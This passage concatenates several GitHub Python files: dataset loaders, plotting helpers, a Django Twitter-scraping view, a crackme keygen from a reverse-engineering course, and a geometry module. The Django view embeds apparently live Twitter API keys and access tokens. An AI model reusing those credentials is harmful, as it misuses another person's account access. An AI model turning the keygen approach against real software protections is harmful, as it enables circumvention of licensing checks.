main()","repo_name":"joncortes22/ClasesBasica","sub_path":"ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31033657859","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pairing as pf\n\nfrom skmultilearn.cluster import MatrixLabelSpaceClusterer\nfrom sklearn.cluster import KMeans\nfrom skmultilearn.dataset import load_dataset\nfrom category_encoders.hashing import HashingEncoder\nfrom sklearn.feature_selection import VarianceThreshold\n\n###____________ CriteoDatasets ____________###\nclass CriteoDatasets():\n def __init__(self):\n self.datasets_list = ['criteo_kaggle']\n\n def create_tabular_dataset(self, train, prc = 10, verbose=False):\n \n def pairit(data):\n p1 = pf.pair(data[\"col_0\"],data[\"col_1\"])\n p2 = pf.pair(p1,data[\"col_2\"])\n return pf.pair(p1,p2)\n\n def code_by_freq(data):\n code = np.where(top_val_count[:,1] == data['col'])[0][0]\n return code\n \n ce_hash = HashingEncoder(cols = list(train.columns[12:]), n_components=3, verbose=1, drop_invariant=True, hash_method='md5')\n 
tmp_data = ce_hash.fit_transform(train[train.columns[2:]])\n tmp_data[\"Label\"] = train[\"Label\"] \n train = tmp_data\n\n train[\"col\"] = train.apply(pairit, axis=1)\n\n bc = np.bincount(train[\"col\"].values.astype(int))\n nz = np.nonzero(bc)[0]\n val_count = np.sort(np.array([list(a) for a in zip(nz,bc[nz])]))\n val_count = val_count[val_count[:,0].argsort()]\n vc_mean = val_count[:,0].mean()\n top_val_count = (val_count[val_count[:,0] > vc_mean][::-1])\n\n train = train.drop(columns=[\"col_0\", \"col_1\", \"col_2\"])\n train = train[train[\"col\"].isin(top_val_count[:,1][:prc])]\n\n\n train[\"prc\"] = train.apply(code_by_freq, axis=1)\n train = train.drop(columns=[\"col\"])\n if verbose:\n print(train[\"prc\"].value_counts())\n\n tmp = list(train.columns[:-2])\n tmp.extend([\"prc\",\"Label\"])\n train = train.reindex(columns=tmp)\n train = train.rename(index=str, columns={\"I2\":\"f1\",\n \"I3\":\"f2\",\n \"I4\":\"f3\",\n \"I5\":\"f4\",\n \"I6\":\"f5\",\n \"I7\":\"f6\",\n \"I8\":\"f7\",\n \"I9\":\"f8\",\n \"I11\":\"f9\",\n \"I13\":\"f10\"})\n\n if verbose:\n print(train.head())\n\n train = train.drop(columns=[\"Label\"])\n train = train.reset_index(drop=True)\n train.head()\n\n X = train[train.columns[:-1]]\n y = train[train.columns[-1]]\n\n return X, y\n\n \n def partition_features(self, K, X, y):\n \n #selector = SelectKBest(mutual_info_classif, k='all')\n #selector.fit(X, y)\n #selected_features = list(selector.scores_)\n #most_feat = set((np.argpartition(selected_features, -K)[-K:]))\n #least_feat = set(range(X.shape[1])).difference(most_feat)\n #most_feat = np.array(sorted(list(most_feat)))\n #least_feat = np.array(sorted(list(least_feat)))\n vt = VarianceThreshold()\n vt.fit(X)\n idx = np.argpartition(vt.variances_, K)\n most_feat = idx[K:]\n least_feat = idx[:K]\n return most_feat, least_feat\n\n def splitted_criteo(self, X, y, N, Kp, shuffle = False, verbose = True, focus=\"pref\"):\n K = X.shape[1]\n if verbose:\n print(\"K = \", Kp)\n most_feat, least_feat = self.partition_features(Kp, X, y)\n if verbose:\n print(\"\\nMost Relevant \",Kp, \" Features:\", most_feat)\n print(\"\\nLeast Relevant \", K-Kp ,\" Features:\", least_feat)\n print(\"Focus on: \", focus)\n if focus == \"pref\":\n pref = X[:,most_feat]\n context = X[:,least_feat]\n\n elif focus == \"context\":\n context = X[:,most_feat] \n pref = X[:,least_feat]\n \n if shuffle:\n c = list(zip(context, pref, X, y))\n np.random.shuffle(c)\n context, pref, y = zip(*c)\n context = np.array(context).squeeze(axis=1)\n pref = np.array(pref).squeeze(axis=1)\n y = np.array(y).squeeze(axis=1)\n else:\n context = np.array(context)\n pref = np.array(pref)\n y = np.array(y)\n if verbose:\n print(\"\\n Contexts Shape: \", context.shape)\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Responses Shape: \", y.shape)\n\n \n if verbose:\n plt.rcParams[\"figure.figsize\"] = 16,4\n plt.bar(range(context.shape[1]), np.asarray(context.sum(axis=0)/context.sum()), label = \"Contexts\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(pref.shape[1]), np.asarray(pref.sum(axis=0)/pref.sum()), label = \"Preferences\")\n plt.legend(prop={'size': 20})\n plt.show()\n\n\n sp_context = np.array_split(context, N)\n sp_pref = np.array_split(pref, N)\n sp_response = np.array_split(y, N)\n\n return sp_context, sp_pref, sp_response\n\n\n###____________ MultiLabelDatasets ____________###\nclass MultiLabelDatasets():\n def __init__(self):\n self.datasets_list = ['mediamill']\n\n def partition_features(self, K, X, y):\n from 
sklearn.feature_selection import chi2, SelectKBest\n selected_features = [] \n for label in range(y.shape[1]):\n selector = SelectKBest(chi2, k='all')\n selector.fit(X, y[:,label])\n selected_features.append(list(selector.scores_))\n avg_selected_features = np.mean(selected_features, axis=0) \n most_feat = set((np.argpartition(avg_selected_features, -K)[-K:]))\n least_feat = set(range(X.shape[1])).difference(most_feat)\n most_feat = np.array(sorted(list(most_feat)))\n least_feat = np.array(sorted(list(least_feat)))\n return most_feat, least_feat\n\n def splitted_mediamill(self, N, red_K, shuffle = False, verbose=True, focus=\"pref\"):\n X_tr, y_tr, feature_names, label_names = load_dataset('mediamill', 'train')\n X_te, y_te, _, _ = load_dataset('mediamill', 'test')\n\n X_tr = X_tr.todense()\n X_te = X_te.todense()\n y_tr = y_tr.todense()\n y_te = y_te.todense()\n if verbose:\n print(\"Shape of Train Data: \", X_tr.shape)\n print(\"Shape of Test Data: \", X_te.shape)\n print(\"Shape of Train Labels: \", y_tr.shape)\n print(\"Shape of Test Data: \", y_te.shape)\n \n X = np.concatenate((X_tr, X_te), axis=0)\n y = np.concatenate((y_tr, y_te), axis=0)\n y = y[:,np.asarray(y.sum(axis=0) > 100)[0]]\n if verbose:\n print(\"Shape of All Data:\", X.shape)\n print(\"Shape of All Labels:\", y.shape)\n \n K= y.shape[1]\n most_feat, least_feat = self.partition_features(K, X, y)\n if verbose:\n print(\"\\nMost Relevant \",K, \" Features:\", most_feat)\n print(\"\\nLeast Relevant \", X.shape[1]-K ,\" Features:\", least_feat)\n\n if focus == \"pref\":\n pref = (X[:,most_feat] > 0.45).astype(float)\n context = (X[:,least_feat] > 0.45).astype(float)\n if verbose:\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Contexts Shape: \", context.shape)\n \n pref = pref[:,np.asarray(pref.sum(axis=0) > 2400)[0]]\n y = y[:,np.asarray(y.sum(axis=0) > 450)[0]]\n context = context[:,np.asarray(np.logical_and(context.sum(axis=0) > 2000 , context.sum(axis=0) < 40000))[0]]\n\n \n elif focus == \"context\":\n context = (X[:,most_feat] > 0.45).astype(float)\n pref = (X[:,least_feat] > 0.45).astype(float)\n if verbose:\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Contexts Shape: \", context.shape)\n \n pref = pref[:,np.asarray(pref.sum(axis=0) > 500)[0]]\n y = y[:,np.asarray(y.sum(axis=0) > 450)[0]]\n context = context[:,np.asarray(np.logical_and(context.sum(axis=0) > 9999 , context.sum(axis=0) < 29000))[0]]\n \n if shuffle:\n c = list(zip(context, pref, y))\n np.random.shuffle(c)\n context, pref, y = zip(*c)\n context = np.array(context).squeeze(axis=1)\n pref = np.array(pref).squeeze(axis=1)\n y = np.array(y).squeeze(axis=1)\n else:\n context = np.array(context)\n pref = np.array(pref)\n y = np.array(y)\n if verbose:\n print(\"\\n Contexts Shape: \", context.shape)\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Actions Shape: \", y.shape)\n \n \n matrix_clusterer = MatrixLabelSpaceClusterer(clusterer=KMeans(n_clusters=red_K))\n similar_ys = matrix_clusterer.fit_predict(context, y)\n if verbose:\n print(\"Silimar Labeles: \", similar_ys)\n \n y_red = np.zeros((y.shape[0],red_K))\n for k, lbs in enumerate(similar_ys):\n for lb in lbs:\n y_red[:,k] += y[:,lb]\n y_red = (y_red >=1).astype(float)\n \n if verbose:\n plt.rcParams[\"figure.figsize\"] = 16,4\n plt.bar(range(context.shape[1]), np.asarray(context.sum(axis=0)), label = \"Contexts\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(pref.shape[1]), np.asarray(pref.sum(axis=0)), label = \"Preferences\")\n 
plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(y_red.shape[1]), np.asarray(y_red.sum(axis=0)), label = \"Responses\")\n plt.legend(prop={'size': 20})\n plt.show()\n\n sp_context = np.array_split(context, N)\n sp_pref = np.array_split(pref, N)\n sp_response = np.array_split(y_red, N)\n \n return sp_context, sp_pref, sp_response\n \n\n def splitted_tmc(self, N, Km, Ksm, shuffle = False, verbose=True, focus=\"pref\"):\n X_tr, y_tr, feature_names, label_names = load_dataset('tmc2007_500', 'train')\n X_te, y_te, _, _ = load_dataset('tmc2007_500', 'test')\n\n X_tr = X_tr.todense()\n X_te = X_te.todense()\n y_tr = y_tr.todense()\n y_te = y_te.todense()\n if verbose:\n print(\"Shape of Train Data: \", X_tr.shape)\n print(\"Shape of Test Data: \", X_te.shape)\n print(\"Shape of Train Labels: \", y_tr.shape)\n print(\"Shape of Test Data: \", y_te.shape)\n\n X = np.concatenate((X_tr, X_te), axis=0)\n y = np.concatenate((y_tr, y_te), axis=0)\n\n most_feat, least_feat = self.partition_features(Km, X, y)\n if verbose:\n print(\"\\nMost Relevant \",Km, \" Features:\", most_feat)\n #print(\"\\nLeast Relevant \", X.shape[1]-Km ,\" Features:\", least_feat)\n\n red_X = X.copy()\n red_X[:, most_feat] = 1\n\n red_most_feat, red_least_feat = self.partition_features(Ksm, red_X, y)\n if verbose:\n print(\"\\nSecond Most Relevant \",Ksm, \" Features:\", red_most_feat)\n #print(\"\\nLeast Relevant \", X.shape[1]-Ksm ,\" Features:\", red_least_feat)\n\n if focus == \"pref\":\n pref = X[:,most_feat]\n context = X[:,red_most_feat]\n elif focus == \"context\":\n context = X[:,most_feat] \n pref = X[:,red_most_feat]\n \n if verbose:\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Contexts Shape: \", context.shape)\n\n\n if shuffle:\n c = list(zip(context, pref, y))\n np.random.shuffle(c)\n context, pref, y = zip(*c)\n context = np.array(context).squeeze(axis=1)\n pref = np.array(pref).squeeze(axis=1)\n y = np.array(y).squeeze(axis=1)\n else:\n context = np.array(context)\n pref = np.array(pref)\n y = np.array(y)\n if verbose:\n print(\"\\n Contexts Shape: \", context.shape)\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Actions Shape: \", y.shape)\n\n if verbose:\n plt.rcParams[\"figure.figsize\"] = 16,4\n plt.bar(range(context.shape[1]), np.asarray(context.sum(axis=0)), label = \"Contexts\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(pref.shape[1]), np.asarray(pref.sum(axis=0)), label = \"Preferences\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(y.shape[1]), np.asarray(y.sum(axis=0)), label = \"Responses\")\n plt.legend(prop={'size': 20})\n plt.show()\n\n sp_context = np.array_split(context, N)\n sp_pref = np.array_split(pref, N)\n sp_response = np.array_split(y, N)\n\n return sp_context, sp_pref, sp_response\n\nclass Synthetic():\n def __init__(self, mapping_function):\n self.mapping_function = mapping_function\n \n def make_hists(self, n_samples, hist_size):\n hists = np.random.rand(n_samples, hist_size)\n hists_sum = np.sum(hists, axis=1 )\n for i in range(len(hists)):\n hists[i,:] = hists[i,:]/hists_sum[i]\n return hists\n\n def generate_data(self, n_users, n_samples, n_actions, context_size, \n ctr_scaling_factor=1., noise_level=.01):\n contexts = list()\n responses = list()\n for u in range(n_users):\n hists = self.make_hists(n_samples, context_size)\n resps_probs = self.mapping_function.predict(hists)\n resps_probs += noise_level * np.random.normal(0,1, (n_samples, n_actions))\n resps_probs = ctr_scaling_factor * resps_probs\n 
resps_probs = np.clip(resps_probs,0,1)\n resps = np.zeros((n_samples, n_actions), dtype=int)\n for s in range(n_samples):\n for a in range(n_actions):\n resps[s, a] = (np.random.rand() <= resps_probs[s, a]).astype(int)\n contexts.append(hists)\n responses.append(resps)\n \n return contexts, responses","repo_name":"mmalekzadeh/privacy-preserving-bandits","sub_path":"bandipy/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":14216,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"78"} +{"seq_id":"26536437721","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"Handles generic visualization/plotting functions.\"\"\"\r\n\r\n# future imports\r\nfrom __future__ import absolute_import, division, print_function\r\n\r\nimport itertools as it\r\nfrom typing import Optional, Union\r\n\r\n# imports\r\nimport numpy as np\r\nfrom pandas import DataFrame\r\n\r\nfrom turbopanda._metapanda import MetaPanda, SelectorType\r\nfrom turbopanda.utils import belongs, remove_na, instance_check, difference, nonnegative\r\n\r\nfrom ._gridplot import gridplot\r\nfrom ._histogram import histogram\r\nfrom ._save_fig import save\r\n\r\n__all__ = (\"scatter_grid\", \"hist_grid\")\r\n\r\n\r\ndef hist_grid(\r\n mdf: Union[DataFrame, \"MetaPanda\"],\r\n subset: SelectorType,\r\n arrange: str = \"square\",\r\n plot_size: int = 3,\r\n shared_dist: str = \"auto\",\r\n savepath: Optional[Union[str, bool]] = None,\r\n **hist_kws\r\n):\r\n \"\"\"\r\n Plots a grid of histograms comparing the distributions in a MetaPanda\r\n selector.\r\n\r\n Parameters\r\n --------\r\n mdf : turb.MetaPanda\r\n The dataset\r\n subset : str or list/tuple of str\r\n Contains either types, meta column names, column names or regex-compliant strings\r\n arrange : str\r\n Choose from ['square', 'row', 'column']. Square arranges the plot as square-like as possible. Row\r\n prioritises plots row-like, and column-wise for column.\r\n plot_size : int, default=3\r\n The size of each axes\r\n shared_dist : str/tuple of str/dict, default=\"auto\"\r\n Determines what KDE to fit to the data, set to None if you don't want\r\n If tuple/list: attempts using these specified distributions\r\n If dict: maps column name (k) to distribution choice (v)\r\n savepath : None, bool, str\r\n saves the figure to file. If bool, uses the name in mdf, else uses given string. 
If None, no fig is saved.\r\n\r\n Other Parameters\r\n ----------------\r\n hist_kws : dict\r\n Keywords to pass to `turb.plot.histogram`\r\n\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n # checks\r\n instance_check(shared_dist, (type(None), str, list, tuple, dict))\r\n instance_check(savepath, (type(None), str, bool))\r\n nonnegative(plot_size, int)\r\n belongs(arrange, [\"square\", \"row\", \"column\"])\r\n # make a metapanda if we have a dataframe.\r\n _mdf = MetaPanda(mdf) if isinstance(mdf, DataFrame) else mdf\r\n\r\n # get selector\r\n selection = _mdf.view(subset)\r\n # assuming we've selected something...\r\n if selection.size > 0:\r\n fig, axes = gridplot(len(selection), arrange, ax_size=plot_size)\r\n\r\n if not isinstance(shared_dist, dict):\r\n for i, x in enumerate(selection):\r\n _ = histogram(\r\n _mdf[x].dropna(), ax=axes[i], title=x, kde=shared_dist, **hist_kws\r\n )\r\n fig.tight_layout()\r\n else:\r\n for i, (x, d) in enumerate(shared_dist.items()):\r\n _ = histogram(_mdf[x].dropna(), ax=axes[i], title=x, kde=d, **hist_kws)\r\n # iterate over any 'remaining' columns in selection and handle appropriately\r\n remaining = difference(selection, tuple(shared_dist.keys()))\r\n if remaining.shape[0] > 0:\r\n for i, x in enumerate(remaining):\r\n _ = histogram(\r\n _mdf[x].dropna(),\r\n ax=axes[i + len(shared_dist)],\r\n title=x,\r\n kde=\"auto\",\r\n **hist_kws\r\n )\r\n fig.tight_layout()\r\n\r\n if isinstance(savepath, bool):\r\n save(fig, \"hist\", _mdf.name_)\r\n elif isinstance(savepath, str):\r\n save(fig, \"hist\", _mdf.name_, fp=savepath)\r\n\r\n\r\ndef scatter_grid(\r\n mdf: Union[DataFrame, \"MetaPanda\"],\r\n x: SelectorType,\r\n y: SelectorType,\r\n arrange: str = \"square\",\r\n plot_size: int = 3,\r\n best_fit: bool = True,\r\n best_fit_deg: int = 1,\r\n savepath: Optional[Union[bool, str]] = None,\r\n):\r\n \"\"\"\r\n Plots a grid of scatter plots comparing each column for MetaPanda\r\n in selector to y target value.\r\n\r\n Parameters\r\n --------\r\n mdf : turb.MetaPanda\r\n The dataset\r\n x : str or list/tuple of str\r\n Contains either types, meta column names, column names or regex-compliant strings\r\n y : str or list/tuple of str\r\n Contains either types, meta column names, column names or regex-compliant strings\r\n arrange : str\r\n Choose from ['square', 'row', 'column']. Square arranges the plot as square-like as possible. Row\r\n prioritises plots row-like, and column-wise for column.\r\n plot_size : int\r\n The size of each axes\r\n best_fit : bool\r\n If True, draws a line of best fit\r\n best_fit_deg : int, default=1\r\n The degree of the line of best fit, can draw polynomial\r\n savepath : None, bool, str\r\n saves the figure to file. 
If bool, uses the name in mdf, else uses given string.\r\n\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n from turbopanda.corr import bicorr\r\n\r\n # checks\r\n instance_check((plot_size, best_fit_deg), int)\r\n instance_check(savepath, (type(None), str, bool))\r\n instance_check(best_fit, bool)\r\n nonnegative(\r\n (\r\n best_fit_deg,\r\n plot_size,\r\n )\r\n )\r\n belongs(arrange, [\"square\", \"row\", \"column\"])\r\n\r\n # make a metapanda if we have a dataframe.\r\n _mdf = MetaPanda(mdf) if isinstance(mdf, DataFrame) else mdf\r\n\r\n # get selector\r\n x_sel = _mdf.view(x)\r\n y_sel = _mdf.view(y)\r\n # create a product between x and y and plot\r\n prod = list(it.product(x_sel, y_sel))\r\n\r\n if len(prod) > 0:\r\n fig, axes = gridplot(len(prod), arrange, ax_size=plot_size)\r\n for i, (_x, _y) in enumerate(prod):\r\n # pair x, y\r\n __x, __y = remove_na(_mdf[_x].values, _mdf[_y].values, paired=True)\r\n axes[i].scatter(__x.flatten(), __y, alpha=0.5)\r\n # line of best fit\r\n if best_fit:\r\n xn = np.linspace(__x.min(), __x.max(), 100)\r\n z = np.polyfit(__x.flatten(), __y, deg=best_fit_deg)\r\n axes[i].plot(xn, np.polyval(z, xn), \"k--\")\r\n\r\n # spearman correlation\r\n pair_corr = bicorr(_mdf[_x], _mdf[_y]).loc[\"spearman\", \"r\"]\r\n axes[i].set_title(\"r={:0.3f}\".format(pair_corr))\r\n axes[i].set_xlabel(_x)\r\n axes[i].set_ylabel(_y)\r\n\r\n fig.tight_layout()\r\n\r\n if isinstance(savepath, bool):\r\n save(fig, \"scatter\", _mdf.name_)\r\n elif isinstance(savepath, str):\r\n save(fig, \"scatter\", _mdf.name_, fp=savepath)\r\n","repo_name":"gregparkes/turbopanda","sub_path":"turbopanda/plot/_visualise.py","file_name":"_visualise.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43405801758","text":"from django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nimport requests\nfrom .models import usertwitx,friendtweet\nfrom django.db.models import Count\n\n\n# Home View\nclass HomeView(LoginRequiredMixin, TemplateView):\n template_name = \"home.html\"\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AdminPasswordChangeForm, PasswordChangeForm\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect\nfrom django.db import IntegrityError\n\nfrom social_django.models import UserSocialAuth\nimport tweepy\nimport json\n\nclass SettingsView(LoginRequiredMixin, TemplateView):\n def get(self, request, *args, **kwargs):\n user = request.user\n\n\n try:\n twitter_login = user.social_auth.get(provider='twitter')\n print(twitter_login.access_token)\n userid=twitter_login.access_token['user_id']\n screen_name=twitter_login.access_token['screen_name']\n\n auth = tweepy.OAuthHandler('okwoO0j3AxHqTTgvxH0Imb1OD','1iZgQDRs7IPv4HsUh36iHQuyBp3Ayn6g2l6iI83E8Hiu75NL3B')\n auth.set_access_token('1129150375720677377-ulmKDn7cD9YkbfSBykS5C2cBo4RHYp','f99siM42vcTDueq4treAVkquuJ80ptnP1li2Llr72lBVQ')\n api=tweepy.API(auth) \n tweets = api.user_timeline(screen_name=screen_name)\n\n\n friendl=api.friends(screen_name)\n\n\n listf=[]\n for friend in friendl:\n listf.append(friend.screen_name)\n\n \n\n try:\n response = requests.get('https://sleepy-ridge-86379.herokuapp.com/results?bm='+screen_name)\n parsed = response.json() #api for getting tweets\n except ValueError:\n parsed={}\n 
print(\"json error\")\n\n \n \n ff=api.get_user(userid) #to get a resizable profile pic\n profiler_photo=ff.profile_image_url_https\n\n uu=profiler_photo.replace('_normal','')\n print(ff.name)\n\n\n\n\n for i in range(0,len(parsed)): #looping through dict\n user_c=parsed[i][\"created_at\"]\n desc=parsed[i][\"text\"]\n url=\"https://twitter.com/geeksforgeeks/status/\"+str(parsed[i][\"id_str\"])\n\n try: #for catching integrity errros\n tw_inf=usertwitx(user_name=screen_name,tweet_id=parsed[i][\"id_str\"],user_c=user_c,desc=desc,url_p=url)\n tw_inf.save()\n\n except IntegrityError as e:\n print(\"duplicacy\")\n break\n\n \n\n\n for i in listf: #for following storage\n\n try:\n response2 = requests.get('https://sleepy-ridge-86379.herokuapp.com/results?bm='+i)\n parsed2 = response2.json() #api for getting tweets\n except ValueError:\n parsed2={}\n continue\n print(\"json error\")\n\n screen_namef=parsed2[0][\"user\"][\"screen_name\"]\n\n for i in range(0,len(parsed2)):\n\n desc2=parsed2[i][\"text\"]\n url2=\"https://twitter.com/geeksforgeeks/status/\"+str(parsed2[i][\"id_str\"])\n\n try: #for catching integrity errros\n tw_inf=friendtweet(friend_name=screen_namef,tweetf_id=parsed2[i][\"id_str\"],desc2=desc2,url_p2=url2)\n tw_inf.save()\n\n except IntegrityError as e:\n print(\"duplicacy\")\n break \n \n\n except UserSocialAuth.DoesNotExist:\n twitter_login = None\n\n\n can_disconnect = (user.social_auth.count() > 1 or user.has_usable_password())\n\n return render(request, 'core/settings.html', {\n\n 'twitter_login': twitter_login,\n 'profiler': ff,\n 'uu':uu,\n 'parsed': parsed,\n \n\n 'can_disconnect': can_disconnect\n })\n\n\n\n\ndef db_store_view(request): #database queries for rendering to frontend\n all_tweets=usertwitx.objects.all\n # print(type(all_tweets))\n a=usertwitx.objects.values_list('user_name').annotate(user_count=Count('user_name')).order_by('-user_count')\n size_m=len(a)\n total_tweets=0\n top=a[0][0]\n for p in a:\n total_tweets+=p[1] #total no of tweets saved\n\n print(total_tweets)\n\n\n friend_tweets=friendtweet.objects.all #db2 of following\n b=friendtweet.objects.values_list('friend_name').annotate(user2_count=Count('friend_name')).order_by('-user2_count')\n print(b)\n size_f=len(b)\n print(size_f)\n\n total_ftweets=0\n\n topf=b[0][0]\n\n for q in b:\n total_ftweets+=q[1] \n\n print(total_ftweets) \n \n return render(request,'db.html',{'all':all_tweets,'top':top,'total_tweets':total_tweets, 'total_master':size_m,'friend_tweets':friend_tweets,'size_f':size_f,'total_ftweets':total_ftweets,'topf':topf})\n\n","repo_name":"jainmayur517/assignment_fairdee","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5095397426","text":"# control flow 3\nimport random\n# our starting possible values\nvalues = list(range(ord('0'), ord('z')+1))\n# removed so we don't need to worry about escaping for this one\nvalues.remove(ord('`'))\n\n\nif __name__ == \"__main__\":\n # make sure the length is greater than or equal 16\n answer = random.choices(values, k=16)\n \n # rock()\n # paper()\n # lizard()\n # spock()\n while True:\n # rock\n one = random.choice(values)\n three = random.choice(values)\n five = random.choice(values)\n six_choices = list(filter(lambda x: x == one + three - five, values))\n\n if len(six_choices) == 0:\n continue\n\n answer[1] = one\n answer[3] = three\n answer[5] = five\n answer[6] = random.choice(six_choices)\n\n # 
paper\n six = answer[6]\n seven_choices = list(filter(lambda x: six ^ x < 0x03, values))\n if len(seven_choices) == 0:\n continue\n\n answer[7] = random.choice(seven_choices)\n\n # lizard()\n seven = answer[7]\n eight_choices = list(filter(lambda x: seven ^ x >= 0x04, values))\n if len(eight_choices) == 0:\n continue\n answer[8] = random.choice(eight_choices)\n\n\n # spock()\n eight = answer[8]\n nine_choices = list(filter(lambda x: eight != x, values))\n if len(nine_choices) == 0:\n continue\n answer[9] = random.choice(nine_choices)\n\n # spock() and scissors()\n # case1 \n # from scissors input[12] == input[10]\n case1 = list(filter(lambda x: (x < 0x03)\n and (x ^ answer[8] ^ answer[9]) != 1, values))\n\n if len(case1) > 0:\n answer[10] = random.choice(case1)\n answer[12] = answer[10]\n break\n\n # case2\n case2 = list(filter(lambda x: (x >= 0x03)\n and (x ^ answer[8] ^ answer[9]) != 0, values))\n \n if len(case2) > 0:\n answer[10] = random.choice(case2)\n answer[12] = answer[10]\n break\n \n # answer\n answer = ''.join(map(lambda x: chr(x), answer))\n print(\"answers:\",answer)","repo_name":"ltran1612/CS579-Reverse-Engineering","sub_path":"BinaryReverseEngineeringWithCrackmes/control_flow3_keygen.py","file_name":"control_flow3_keygen.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11749341013","text":"from collections import namedtuple\nfrom functools import lru_cache\n\nfrom sage.all import *\n\nfrom samsurf.triangle import Triangle, is_valid_barycentric_coordinate\nfrom samsurf.halfplane import HalfPlane\n\n\nclass Hinge:\n \"\"\" Two adjacent triangles where a hinge transformation could be performed.\n -\n :param tri: a Triangle\n :param id_edge: an edge vector, the shared edge identified by tri\n :param tri_opp: a Triangle, the triangle opposite tri\n :param id_edge_op: an edge vector, the shared edge identified by tri_opp\n id_edge and id_edge_op are tuples of (triangle id, edge id), not vectors\n\n - See document for examples of labeling tri, tri_opp and edges.\n \"\"\"\n def __init__(self, tri, id_edge, tri_opp, id_edge_opp):\n self.tri = tri\n self.id_edge = id_edge\n self.tri_opp = tri_opp\n self.id_edge_opp = id_edge_opp\n\n edge = tri[id_edge[1]]\n edge_opp = tri_opp[id_edge_opp[1]]\n\n if edge != -edge_opp:\n raise ValueError(\"Edges either nonparallel or improperly oriented\")\n\n v0 = tri[(id_edge[1] + 1) % 3]\n v1 = edge_opp\n v2 = -tri_opp[(id_edge_opp[1] - 1) % 3]\n\n self.vectors = (v0,v1,v2)\n\n @property\n def coordinates(self):\n return tuple(coord for vector in self.vectors for coord in vector)\n\n def __hash__(self):\n return hash((self.coordinates,))\n\n @classmethod\n def from_id_edge(cls, trin, id_edge):\n label_tri, label_edge = id_edge\n\n id_edge_opp = trin.gluings[id_edge]\n\n label_tri_opp, label_edge_opp = id_edge_opp\n\n tri = trin.triangles[label_tri]\n tri_opp = trin.triangles[label_tri_opp]\n\n return Hinge(tri, id_edge, tri_opp, id_edge_opp)\n\n @property\n def is_convex(self):\n v0, v1, v2 = self.vectors\n boundary = [v0, v1 - v0, v2 - v1, -v2]\n crosses = [w0x * w1y - w1x * w0y\n for (w0x, w0y), (w1x, w1y)\n in zip(boundary, boundary[1:] + boundary[:1])]\n\n all_positive = all(bool(cross > 0) for cross in crosses)\n all_negative = all(bool(cross < 0) for cross in crosses)\n\n return all_positive or all_negative\n\n @property\n def marked_cartesian_coords(self):\n v0, v1, v2 = self.vectors\n cartesian_coords_list = []\n\n change_of_basis_tri = 
column_matrix([v1, v0])\n id_edge_tri = self.id_edge[1]\n for bary_coord, color in self.tri.points_marked:\n partial_coord = (bary_coord[id_edge_tri], bary_coord[(id_edge_tri + 2) % 3])\n cartesian_coord = change_of_basis_tri * vector(partial_coord)\n cartesian_coords_list.append((cartesian_coord, color))\n\n change_of_basis_opp = column_matrix([v2,v1])\n id_edge_opp = self.id_edge_opp[1]\n for bary_coord, color in self.tri_opp.points_marked:\n partial_coord = (bary_coord[(id_edge_opp + 2) % 3], bary_coord[(id_edge_opp + 1) % 3])\n cartesian_coord = change_of_basis_opp * vector(partial_coord)\n cartesian_coords_list.append((cartesian_coord, color))\n\n return cartesian_coords_list\n\n def mark_cartesian_coord(self, cartesian_coord, color):\n tri = self.tri\n opp = self.tri_opp\n v0, v1, v2 = self.vectors\n\n change_of_basis_tri = column_matrix([v1, v0])\n id_edge_tri = self.id_edge[1]\n partial_coord = change_of_basis_tri**(-1) * vector(cartesian_coord)\n bary_coord_indexed = sorted([(id_edge_tri, partial_coord[0]),\n ((id_edge_tri + 1) % 3, 1 - partial_coord[0] - partial_coord[1]),\n ((id_edge_tri + 2) % 3, partial_coord[1])])\n bary_coord = tuple(coord for index, coord in bary_coord_indexed)\n if is_valid_barycentric_coordinate(*bary_coord):\n tri = tri.mark_point(bary_coord, color)\n\n change_of_basis_opp = column_matrix([v2, v1])\n id_edge_opp = self.id_edge_opp[1]\n partial_coord = change_of_basis_opp**(-1) * vector(cartesian_coord)\n bary_coord_indexed = sorted([(id_edge_opp, 1 - partial_coord[0] - partial_coord[1]),\n ((id_edge_opp + 1) % 3, partial_coord[1]),\n ((id_edge_opp + 2) % 3, partial_coord[0])])\n bary_coord = tuple(coord for index, coord in bary_coord_indexed)\n if is_valid_barycentric_coordinate(*bary_coord):\n opp = opp.mark_point(bary_coord, color)\n\n return Hinge(tri, self.id_edge, opp, self.id_edge_opp)\n\n def flip(self):\n \"\"\"Performs hinge flip and maintains the locations of marked points.\n -See document for how labeling is done.\"\"\"\n v0, v1, v2 = self.vectors\n\n # produce new side list maintaining order such that v1 is still v1\n sides_ordered = sorted([(self.id_edge[1], v0 - v2),\n ((self.id_edge[1] + 1) % 3, v1 - v0),\n ((self.id_edge[1] + 2) % 3, v2 - 